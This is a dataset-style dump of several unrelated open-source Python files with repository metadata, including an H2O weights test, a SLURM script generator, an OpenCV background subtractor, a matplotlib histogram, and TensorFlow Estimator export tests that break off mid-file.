h2o_data_zeros_removed = h2o_cars_data[h2o_zero_weights["weights"] == 1]
print "\n\nChecking that using some zero weights is equivalent to removing those observations:"
check_same(h2o_data_zeros_removed, h2o_data_zero_weights, 1)
# doubled weights same as doubled observations
doubled_weights = [[1] if random.randint(0,1) else [2] for r in range(406)]
h2o_doubled_weights = h2o.H2OFrame(python_obj=doubled_weights)
h2o_doubled_weights.setNames(["weights"])
h2o_data_doubled_weights = h2o_cars_data.cbind(h2o_doubled_weights)
doubled_data = h2o.as_list(h2o_cars_data, use_pandas=False)
colnames = doubled_data.pop(0)
for idx, w in enumerate(doubled_weights):
if w[0] == 2: doubled_data.append(doubled_data[idx])
h2o_data_doubled = h2o.H2OFrame(python_obj=doubled_data)
h2o_data_doubled.setNames(colnames)
h2o_data_doubled["economy_20mpg"] = h2o_data_doubled["economy_20mpg"].asfactor()
h2o_data_doubled["cylinders"] = h2o_data_doubled["cylinders"].asfactor()
h2o_data_doubled_weights["economy_20mpg"] = h2o_data_doubled_weights["economy_20mpg"].asfactor()
h2o_data_doubled_weights["cylinders"] = h2o_data_doubled_weights["cylinders"].asfactor()
print "\n\nChecking that doubling some weights is equivalent to doubling those observations:"
check_same(h2o_data_doubled, h2o_data_doubled_weights, 1)
if __name__ == "__main__":
h2o.run_test(sys.argv, weights_var_imp)
| [
"[email protected]"
] | |
5a792baad7875ecfd9cb09eb33eff687dbab1295 | 1699300e1225f0994fbfd5e13a7eb4436a5df14d | /03_SC_Track/02_Original_V_624_Joho/Make_SLURM_submission_script.py | 6ff6b2d5f59e75247f2e258efde560ac32922702 | [
"MIT"
] | permissive | HaroonRafique/PyORBIT_MD4224 | 26307a60ed79f3e170fbd655eb8cbe8cc9a0dfa9 | 6f68a80b2f8bf1cbeb9e2fc840925efe8a8b5672 | refs/heads/master | 2023-04-25T13:27:49.756836 | 2020-08-25T10:26:07 | 2020-08-25T10:26:07 | 215,249,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,313 | py | #!/usr/bin/env python
# Python script to create a SLURM submission script for PyORBIT
# 21 March 2019 Haroon Rafique CERN BE-ABP-HSI
import os
#-----------------------------------------------------------------------
# SETTINGS
#-----------------------------------------------------------------------
script_name = "SLURM_submission_script.sh"
# Switches
hyperthreading = False # Enable hyperthreading
exclusive = True # Exclusive (see SLURM documentation)
autotime = True	# 48 h (batch-short), 120 h (inf-short), 504 h (long queues)
autotask = True # Automatically set nodes to maximum tasks
clean_all = True # Clean simulation folder before running (False when resuming pickle checkpoint)
# Must be chosen
# ~ queue = 'inf-long', 'inf-short', 'batch-long', 'batch-short'
queue = 'batch-short'
n_nodes = 2
jobname = '03_02'
path_to_simulation = os.path.dirname(os.path.realpath(__file__)) # This directory
# Optional - have to use with correct switches
manual_time = '504:00:00' # manually set using format 'hours:minutes:seconds'
manual_tasks = 40 # manually change ntasks
# Defaults - can be changed
output_file_name = 'slurm.%N.%j.out'
error_file_name = 'slurm.%N.%j.err'
root_dir = '/hpcscratch/user/harafiqu'
simulation_file = 'pyOrbit.py'
#-----------------------------------------------------------------------
# AUTOMATICALLY FORMAT SCRIPT
#-----------------------------------------------------------------------
n_tasks = 0
if autotask:
if hyperthreading:
if 'batch' in queue: n_tasks = 32
elif 'inf' in queue: n_tasks = 40
else:
print 'queue not recognised'
exit(0)
else:
if 'batch' in queue: n_tasks = 16
elif 'inf' in queue: n_tasks = 20
else:
print 'queue not recognised'
exit(0)
else: n_tasks = manual_tasks
time = '48:00:00'
if autotime:
if queue == 'batch-short': time = '48:00:00'
elif queue == 'inf-short': time = '120:00:00'
elif queue == 'inf-long' or 'batch-long': time = '504:00:00'
else:
print 'queue not recognised'
exit(0)
else: time = manual_time
#-----------------------------------------------------------------------
# WRITE FILE
#-----------------------------------------------------------------------
if os.path.exists(script_name):
print 'SLURM submission script ' + script_name + ' already exists. Deleting'
os.remove(script_name)
print "Creating ", script_name
f= open(script_name,"w")
f.write('#!/bin/bash')
f.write('\n#SBATCH --job-name=' + str(jobname))
f.write('\n#SBATCH --output=' + str(output_file_name))
f.write('\n#SBATCH --error=' + str(error_file_name))
f.write('\n#SBATCH --nodes=' + str(n_nodes))
f.write('\n#SBATCH --ntasks-per-node=' + str(n_tasks))
f.write('\n#SBATCH --partition=' + str(queue))
f.write('\n#SBATCH --time=' + str(time))
f.write('\n#SBATCH --mem-per-cpu=3200M')
if (exclusive): f.write('\n#SBATCH --exclusive')
if not hyperthreading: f.write('\n#SBATCH --hint=nomultithread')
f.write('\n')
f.write('\nBATCH_ROOT_DIR=' + str(root_dir))
f.write('\nRUN_DIR=' + str(path_to_simulation))
f.write('\nOrigIwd=$(pwd)')
f.write('\n')
f.write('\n# Make an output folder in the root directory to hold SLURM info file')
f.write('\ncd ${BATCH_ROOT_DIR}')
f.write('\noutput_dir="output"')
f.write('\nmkdir -p $output_dir')
f.write('\n')
f.write('\n# Fill the SLURM info file')
f.write('\nsimulation_info_file="${BATCH_ROOT_DIR}/${output_dir}/simulation_info_${SLURM_JOB_ID}.${SLURM_NODEID}.${SLURM_PROCID}.txt"')
f.write('\necho "PyOrbit path: `readlink -f ${ORBIT_ROOT}`" >> ${simulation_info_file}')
f.write('\necho "Run path: `readlink -f ${RUN_DIR}`" >> ${simulation_info_file}')
f.write('\necho "Submit host: `readlink -f ${SLURM_SUBMIT_HOST}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job name: `readlink -f ${SLURM_JOB_NAME}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job ID: `readlink -f ${SLURM_JOB_ID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Nodes allocated: `readlink -f ${SLURM_JOB_NUM_NODES}`" >> ${simulation_info_file}')
f.write('\necho "SLURM CPUS per Node: `readlink -f ${SLURM_CPUS_ON_NODE}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Node ID: `readlink -f ${SLURM_NODEID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM total cores for job: `readlink -f ${SLURM_NTASKS}`" >> ${simulation_info_file}')
f.write('\necho "SLURM process ID: `readlink -f ${SLURM_PROCID}`" >> ${simulation_info_file}')
f.write('\necho "****************************************" >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Enter job directory, clean it, and setup environment -> SLURM info file')
f.write('\ncd ${RUN_DIR}')
if clean_all:f.write('\n./clean_all.sh')
f.write('\n. setup_environment.sh >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Load correct MPI')
f.write('\nmodule load mpi/mvapich2/2.3')
f.write('\n')
f.write('\ntstart=$(date +%s)')
f.write('\n')
f.write('\n# Run the job')
if hyperthreading:f.write('\nsrun ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
else:f.write('\nsrun --hint=nomultithread ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
f.write('\n')
f.write('\ntend=$(date +%s)')
f.write('\ndt=$(($tend - $tstart))')
f.write('\necho "total simulation time (s): " $dt >> ${simulation_info_file}')
f.close()
print 'SLURM submission script creation finished'
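# Illustrative header of the script this generates with the defaults above
# (n_tasks=16 because hyperthreading is off on a batch queue):
#
#   #!/bin/bash
#   #SBATCH --job-name=03_02
#   #SBATCH --output=slurm.%N.%j.out
#   #SBATCH --error=slurm.%N.%j.err
#   #SBATCH --nodes=2
#   #SBATCH --ntasks-per-node=16
#   #SBATCH --partition=batch-short
#   #SBATCH --time=48:00:00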
| [
"[email protected]"
] | |
1beabcb56dd1176bcf5845a34ee13550fc79898d | 6a612dba404176b7e180dfb2791353701c82a3bf | /processors/backsubtractors.py | bce6b46663e1146affff7a04f9cff7a61ad6f29c | [] | no_license | tulare/smile-in-the-light | d15a3e142974a055215b3eb9ac8dd1e5e57fdb1e | 1250579f015fa4cb8c4593976e27579e5ed5515d | refs/heads/master | 2020-05-27T07:57:29.617680 | 2019-06-26T10:31:39 | 2019-06-26T10:31:39 | 188,537,874 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 943 | py | # -*- encoding: utf8 -*-
import cv2 as cv
import numpy as np
from .core import FrameProcessor
__all__ = [ 'BackgroundSubtractor' ]
# ------------------------------------------------------------------------------
OPENCV_BACKSUB_ALGOS = {
'MOG2' : cv.createBackgroundSubtractorMOG2,
'KNN' : cv.createBackgroundSubtractorKNN,
}
# ------------------------------------------------------------------------------
class BackSubProcessor(FrameProcessor) :
def params(self, **kwargs) :
algo = kwargs.get('algo', 'MOG2')
try :
self.backsub = OPENCV_BACKSUB_ALGOS[algo]()
except KeyError :
self.backsub = OPENCV_BACKSUB_ALGOS['KNN']()
def apply(self, frame, context) :
fgmask = self.backsub.apply(frame)
frame = cv.bitwise_and(frame, frame, mask=fgmask)
return frame
# ------------------------------------------------------------------------------
| [
"[email protected]"
] | |
8c4480388e7fa8726898f73420d2f3df40bbf8a5 | d5f2723c879e28d1bfded4bea3c4d327a6d8c4e5 | /03_Visualizing_Data/3_histogram.py | 4ce05d1953f447a9609544f396aa265152f8f6a8 | [
"Unlicense"
] | permissive | ramalho/data-science-from-scratch | 709adb2bbef280c10edad4bdc2eb3d2a997d5e79 | 46ead47912c4a0a945decdded1999a8a4cd67b57 | refs/heads/master | 2020-12-30T23:46:40.147841 | 2017-01-28T01:01:54 | 2017-01-28T01:01:54 | 80,624,463 | 2 | 0 | null | 2017-02-01T13:52:20 | 2017-02-01T13:52:20 | null | UTF-8 | Python | false | false | 964 | py | #!/usr/bin/env python3
"""Figure 3-3. Using a bar chart for a histogram"""
import matplotlib.pyplot as plt
from collections import Counter
def make_chart_histogram():
grades = [83,95,91,87,70,0,85,82,100,67,73,77,0]
decile = lambda grade: grade // 10 * 10
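    # e.g. decile(87) -> 80 and decile(100) -> 100, so grades bucket into 0, 10, ..., 100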
histogram = Counter(decile(grade) for grade in grades)
plt.bar([x - 4 for x in histogram.keys()], # shift each bar to the left by 4
histogram.values(), # give each bar its correct height
8) # give each bar a width of 8
plt.axis([-5, 105, 0, 5]) # x-axis from -5 to 105,
# y-axis from 0 to 5
plt.xticks([10 * i for i in range(11)]) # x-axis labels at 0, 10, ..., 100
plt.xlabel("Decile")
plt.ylabel("# of Students")
plt.title("Distribution of Exam 1 Grades")
plt.show()
if __name__ == "__main__":
make_chart_histogram()
| [
"[email protected]"
] | |
9096829dbf0ff0e9494f24cf8e1132798e9fa9fa | cf6a50732d708a3a3db0f297b73cb6f449a00b44 | /Practice13_LoopingTechniques/Prac_13_13_change_code.py | 9a157c3b996983c6bd0817e18f131585525f2a57 | [] | no_license | subash319/PythonDepth | 9fe3920f4b0a25be02a9abbeeb60976853ab812e | 0de840b7776009e8e4362d059af14afaac6a8879 | refs/heads/master | 2022-11-16T03:03:56.874422 | 2020-07-17T01:19:39 | 2020-07-17T01:19:39 | 266,921,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 568 | py | # 13.
#
# data = [2,3,1,4,7,5]
# max_even = 0
# for item in data:
# if item%2==0 and item>max_even:
# max_even = item
# print(f'Largest even number is {max_even}')
# In this for loop, we are iterating over the items of a list and finding the largest even number.
#
# Make changes in this code so that you get the largest even number as well as its index.
data = [2,3,1,4,7,5]
max_even = 0
for index, item in enumerate(data):
if item%2==0 and item>max_even:
max_even = item
idx = index
print(f'Largest even number is {max_even} at index {idx}') | [
"[email protected]"
] | |
d0093035d3098ebaa03f79ae3da3b4850586ba93 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_1_neat/16_0_1_yordan_main.py | f1df87f60260bd9647255e67663f6aa609dbebc2 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 884 | py | #!/usr/bin/env python
import sys
def digits(x):
x = abs(x)
d = []
while x:
d.append(x % 10)
x //= 10
return d or [0]
def gen(x):
i = 1
while 1:
yield x * i
i += 1
def read_input(f):
N = int(f.readline())
inputs = []
for line in f:
inputs.append(int(line))
assert len(inputs) == N
return inputs
def solve(x):
if x == 0:
return 'INSOMNIA'
mask = 0x0
for y in gen(x):
for d in digits(y):
assert d <= 10
mask |= (1 << d)
if mask == 0b1111111111:
return y
return 'Damn...'
def main():
inputs = read_input(sys.stdin)
for i, x in enumerate(inputs, start=1):
# print('i={}, x={}'.format(i, digits(x)))
print('Case #{}: {}'.format(i, solve(x)))
if __name__ == '__main__':
main()
| [
"[[email protected]]"
] | |
5d4c4aa85a2d9cdec40ea80181cfef2bfb26c1ec | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/appconfiguration/get_private_endpoint_connection.py | f7cc2cd97bd2658bf9e3e438d054acac99b5aaaf | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,437 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
__all__ = [
'GetPrivateEndpointConnectionResult',
'AwaitableGetPrivateEndpointConnectionResult',
'get_private_endpoint_connection',
]
@pulumi.output_type
class GetPrivateEndpointConnectionResult:
"""
A private endpoint connection
"""
def __init__(__self__, id=None, name=None, private_endpoint=None, private_link_service_connection_state=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if private_endpoint and not isinstance(private_endpoint, dict):
raise TypeError("Expected argument 'private_endpoint' to be a dict")
pulumi.set(__self__, "private_endpoint", private_endpoint)
if private_link_service_connection_state and not isinstance(private_link_service_connection_state, dict):
raise TypeError("Expected argument 'private_link_service_connection_state' to be a dict")
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
The resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> Optional['outputs.PrivateEndpointResponse']:
"""
The resource of private endpoint.
"""
return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> 'outputs.PrivateLinkServiceConnectionStateResponse':
"""
A collection of information about the state of the connection between service consumer and provider.
"""
return pulumi.get(self, "private_link_service_connection_state")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning status of the private endpoint connection.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetPrivateEndpointConnectionResult(GetPrivateEndpointConnectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPrivateEndpointConnectionResult(
id=self.id,
name=self.name,
private_endpoint=self.private_endpoint,
private_link_service_connection_state=self.private_link_service_connection_state,
provisioning_state=self.provisioning_state,
type=self.type)
def get_private_endpoint_connection(config_store_name: Optional[str] = None,
private_endpoint_connection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateEndpointConnectionResult:
"""
A private endpoint connection
API Version: 2020-06-01.
:param str config_store_name: The name of the configuration store.
:param str private_endpoint_connection_name: Private endpoint connection name
:param str resource_group_name: The name of the resource group to which the container registry belongs.
"""
__args__ = dict()
__args__['configStoreName'] = config_store_name
__args__['privateEndpointConnectionName'] = private_endpoint_connection_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:appconfiguration:getPrivateEndpointConnection', __args__, opts=opts, typ=GetPrivateEndpointConnectionResult).value
return AwaitableGetPrivateEndpointConnectionResult(
id=__ret__.id,
name=__ret__.name,
private_endpoint=__ret__.private_endpoint,
private_link_service_connection_state=__ret__.private_link_service_connection_state,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
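# Usage sketch (hypothetical resource names; requires a configured Azure
# environment, so it is left commented out):
#
#   conn = get_private_endpoint_connection(
#       config_store_name="my-config-store",
#       private_endpoint_connection_name="my-connection",
#       resource_group_name="my-resource-group")
#   pulumi.export("state", conn.provisioning_state)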
| [
"[email protected]"
] | |
f9b5b697037e33f9f12b027bc0b5b2c9630275de | 18d223e5ea590e60bc791987034276eed2651721 | /sk1-tt/lesson2-data-processing/c4-unsupervised-learning/c42_feature_agglomerative.py | 51862d664f81bccb84812f300309511d5d5b2662 | [] | no_license | sonicfigo/tt-sklearn | 83b419b4f8984fc63ef41bf2af5b682477350992 | 8e473e958b0afc6154ba3c4dee818fd4da8f504b | refs/heads/master | 2020-03-26T16:07:59.758723 | 2018-09-25T06:28:47 | 2018-09-25T06:28:47 | 145,084,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,611 | py | # coding=utf-8
"""
The lasso used earlier relies on the sparsity technique and can be used to
tackle the curse of dimensionality.
Another approach: feature agglomeration (clustering the features; note the
difference from hierarchical clustering applied directly to the data).
Ordinary clustering
    groups the data according to the features.
Feature agglomeration
    transposes the data and clusters the features instead.
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, cluster
from sklearn.feature_extraction.image import grid_to_graph
digits = datasets.load_digits()
images = digits.images  # images are (1797, 8, 8)
X = np.reshape(images, (len(images), -1)) # (1797, 64)
connectivity = grid_to_graph(*images[0].shape) # (64, 64)
"""
Run the feature agglomeration
"""
agglo = cluster.FeatureAgglomeration(connectivity=connectivity,
n_clusters=32)
agglo.fit(X)
"""
X (1797, 64)
is reduced to
X_reduced (1797, 32)

Two methods of the FeatureAgglomeration instance matter here:
1. transform
2. inverse_transform
"""
X_reduced = agglo.transform(X) # (1797, 32)
X_approx = agglo.inverse_transform(X_reduced) # (1797, 64)
images_approx = np.reshape(X_approx, images.shape) # (1797, 8, 8)
print(images_approx.shape)
IMG_INDEX = 23
plt.figure(1)
print(images[IMG_INDEX])
print(np.unique(images[IMG_INDEX]))
plt.imshow(images[IMG_INDEX])
print('\n=================== To the naked eye, the original image (64 features) and the compressed image (32 features) look almost the same')
plt.figure(2)
print(images_approx[IMG_INDEX])
print(np.unique(images_approx[IMG_INDEX]))
plt.imshow(images_approx[IMG_INDEX])
plt.show()
| [
"[email protected]"
] | |
5419f9bd1ab6510ad576878fcae58ddc84a24b7c | 1a114943c92a5db40034470ff31a79bcf8ddfc37 | /stdlib_exam/os-path-expandvars-example-1.py | b2b9b437176caf6eedbc4bca41e3855d1d665823 | [] | no_license | renwl/mylinux | 1924918599efd6766c266231d66b2a7ed6f6cdd1 | 0602fc6d2b0d254a8503e57310f848fc3e1a73b4 | refs/heads/master | 2020-07-10T22:12:03.259349 | 2017-01-02T12:32:04 | 2017-01-02T12:32:04 | 66,467,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | import os
os.environ["USER"] = "user"
print os.path.expandvars("/home/$USER/config")
print os.path.expandvars("$USER/folders")
## /home/user/config
## user/folders
| [
"[email protected]"
] | |
f29d9ae762e6121f945faa8462bdcac0b729d598 | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/vml/test_write_fill.py | 27a23de9f742660fba4a29b9a6d8916f3102aaa4 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 993 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, [email protected]
#
import unittest
from ...compatibility import StringIO
from ...vml import Vml
class TestWriteVfill(unittest.TestCase):
"""
Test the Vml _write_fill() method.
"""
def setUp(self):
self.fh = StringIO()
self.vml = Vml()
self.vml._set_filehandle(self.fh)
def test_write_comment_fill(self):
"""Test the _write_comment_fill() method"""
self.vml._write_comment_fill()
exp = """<v:fill color2="#ffffe1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_button_fill(self):
"""Test the _write_button_fill() method"""
self.vml._write_button_fill()
exp = """<v:fill color2="buttonFace [67]" o:detectmouseclick="t"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
| [
"[email protected]"
] | |
4549800fa025d377dbda0dad826ebec6f702b5c0 | bad9d42860b9c85bf7316cad108cc6ff071bb705 | /tensorflow_estimator/python/estimator/export/export_test.py | 2f32f0301c4ed4b17e4f346f1176d2313ec4e036 | [
"Apache-2.0"
] | permissive | tensorflow/estimator | 1a7e469608094f17bece71867c01f22d51d28080 | 359acd5314462c05ef97f9a820d4ace876550c7e | refs/heads/master | 2023-08-17T09:54:38.668302 | 2023-08-04T00:01:29 | 2023-08-04T00:02:02 | 143,069,012 | 331 | 249 | Apache-2.0 | 2023-09-06T21:19:22 | 2018-07-31T20:55:45 | Python | UTF-8 | Python | false | false | 23,540 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for export."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from google.protobuf import text_format
from tensorflow.core.example import example_pb2
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow_estimator.python.estimator.export import export
class LabeledTensorMock(object):
"""Mock class emulating LabeledTensor."""
def __init__(self):
self.tensor = tf.constant([1])
def _convert_labeled_tensor_mock_to_tensor(value, *args, **kwargs):
return ops.internal_convert_to_tensor(value.tensor, *args, **kwargs)
tf.register_tensor_conversion_function(LabeledTensorMock,
_convert_labeled_tensor_mock_to_tensor)
class ServingInputReceiverTest(tf.test.TestCase):
def test_serving_input_receiver_constructor(self):
"""Tests that no errors are raised when input is expected."""
features = {
"feature0": tf.constant([0]),
u"feature1": tf.constant([1]),
"feature2": tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
# ints are allowed only in the `features` dict
42: tf.constant([3]),
}
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
export.ServingInputReceiver(features, receiver_tensors)
def test_serving_input_receiver_features_invalid(self):
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
with self.assertRaisesRegexp(ValueError, "features must be defined"):
export.ServingInputReceiver(
features=None, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"feature keys must be strings or ints"):
export.ServingInputReceiver(
features={42.2: tf.constant([1])}, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(
ValueError, "feature feature1 must be a Tensor, SparseTensor, or "
"RaggedTensor."):
export.ServingInputReceiver(
features={"feature1": [1]}, receiver_tensors=receiver_tensors)
def test_serving_input_receiver_receiver_tensors_invalid(self):
features = {
"feature0": tf.constant([0]),
u"feature1": tf.constant([1]),
"feature2": tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
}
with self.assertRaisesRegexp(ValueError,
"receiver_tensors must be defined"):
export.ServingInputReceiver(features=features, receiver_tensors=None)
with self.assertRaisesRegexp(ValueError,
"receiver_tensor keys must be strings"):
export.ServingInputReceiver(
features=features,
receiver_tensors={1: tf.constant(["test"], name="example0")})
with self.assertRaisesRegexp(ValueError,
"receiver_tensor example1 must be a Tensor"):
export.ServingInputReceiver(
features=features, receiver_tensors={"example1": [1]})
def test_single_feature_single_receiver(self):
feature = tf.constant(5)
receiver_tensor = tf.constant(["test"])
input_receiver = export.ServingInputReceiver(feature, receiver_tensor)
# single feature is automatically named
feature_key, = input_receiver.features.keys()
self.assertEqual("feature", feature_key)
# single receiver is automatically named
receiver_key, = input_receiver.receiver_tensors.keys()
self.assertEqual("input", receiver_key)
def test_multi_feature_single_receiver(self):
features = {"foo": tf.constant(5), "bar": tf.constant(6)}
receiver_tensor = tf.constant(["test"])
_ = export.ServingInputReceiver(features, receiver_tensor)
def test_multi_feature_multi_receiver(self):
features = {"foo": tf.constant(5), "bar": tf.constant(6)}
receiver_tensors = {"baz": tf.constant(5), "qux": tf.constant(6)}
_ = export.ServingInputReceiver(features, receiver_tensors)
def test_feature_wrong_type(self):
feature = "not a tensor"
receiver_tensor = tf.constant(["test"])
with self.assertRaises(ValueError):
_ = export.ServingInputReceiver(feature, receiver_tensor)
def test_feature_labeled_tensor(self):
feature = LabeledTensorMock()
receiver_tensor = tf.constant(["test"])
_ = export.ServingInputReceiver(feature, receiver_tensor)
def test_receiver_wrong_type(self):
feature = tf.constant(5)
receiver_tensor = "not a tensor"
with self.assertRaises(ValueError):
_ = export.ServingInputReceiver(feature, receiver_tensor)
class UnsupervisedInputReceiverTest(tf.test.TestCase):
# Since this is basically a wrapper around ServingInputReceiver, we only
# have a simple sanity check to ensure that it works.
def test_unsupervised_input_receiver_constructor(self):
"""Tests that no errors are raised when input is expected."""
features = {
"feature0":
tf.constant([0]),
u"feature1":
tf.constant([1]),
"feature2":
tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
42: # ints are allowed only in the `features` dict
tf.constant([3]),
}
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
export.UnsupervisedInputReceiver(features, receiver_tensors)
class SupervisedInputReceiverTest(tf.test.TestCase):
def test_input_receiver_constructor(self):
"""Tests that no errors are raised when input is expected."""
features = {
"feature0":
tf.constant([0]),
u"feature1":
tf.constant([1]),
"feature2":
tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
42: # ints are allowed in the `features` dict
tf.constant([3]),
}
labels = {
"classes": tf.constant([0] * 100),
43: # ints are allowed in the `labels` dict
tf.constant([3]),
}
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
export.SupervisedInputReceiver(features, labels, receiver_tensors)
def test_input_receiver_raw_values(self):
"""Tests that no errors are raised when input is expected."""
features = {
"feature0":
tf.constant([0]),
u"feature1":
tf.constant([1]),
"feature2":
tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
42: # ints are allowed in the `features` dict
tf.constant([3]),
}
labels = {
"classes": tf.constant([0] * 100),
43: # ints are allowed in the `labels` dict
tf.constant([3]),
}
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
rec = export.SupervisedInputReceiver(features["feature2"], labels,
receiver_tensors)
self.assertIsInstance(rec.features, tf.sparse.SparseTensor)
rec = export.SupervisedInputReceiver(features, labels["classes"],
receiver_tensors)
self.assertIsInstance(rec.labels, tf.Tensor)
def test_input_receiver_features_invalid(self):
features = tf.constant([0] * 100)
labels = tf.constant([0])
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
with self.assertRaisesRegexp(ValueError, "features must be defined"):
export.SupervisedInputReceiver(
features=None, labels=labels, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"feature keys must be strings or ints"):
export.SupervisedInputReceiver(
features={1.11: tf.constant([1])},
labels=labels,
receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"label keys must be strings or ints"):
export.SupervisedInputReceiver(
features=features,
labels={1.11: tf.constant([1])},
receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(
ValueError, "feature feature1 must be a Tensor, SparseTensor, or "
"RaggedTensor."):
export.SupervisedInputReceiver(
features={"feature1": [1]},
labels=labels,
receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"feature must be a Tensor, SparseTensor, "
"or RaggedTensor."):
export.SupervisedInputReceiver(
features=[1], labels=labels, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"label must be a Tensor, SparseTensor, "
"or RaggedTensor."):
export.SupervisedInputReceiver(
features=features, labels=100, receiver_tensors=receiver_tensors)
def test_input_receiver_receiver_tensors_invalid(self):
features = {
"feature0":
